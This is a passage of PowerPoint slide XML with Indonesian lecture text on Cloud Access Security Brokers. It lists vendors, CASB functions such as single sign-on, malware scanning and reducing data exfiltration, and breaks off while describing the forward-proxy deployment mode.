            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Vendor CASB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Blue Coat, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh Symantec (broadcom.com/ products/cyber-security/information-protection/cloud-application-security-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cloudsoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Skyhigh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Security (skyhighsecurity.com), Forcepoint (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>forcepoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. com/product/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>casb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- cloud-access-security-broker), Microsoft Cloud App Security (microsoft.com/id/us/ microsoft-365/enterprise-mobility-security/cloud-app-security), dan Cisco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Cloudlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (cisco.com/c/id/us/products/security/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cloudlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/index.html).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>CASB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>visibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simpul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CASB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nakal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaudit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksfiltrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, CASB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Forward proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diposisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meneruskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> real time, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disetujui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
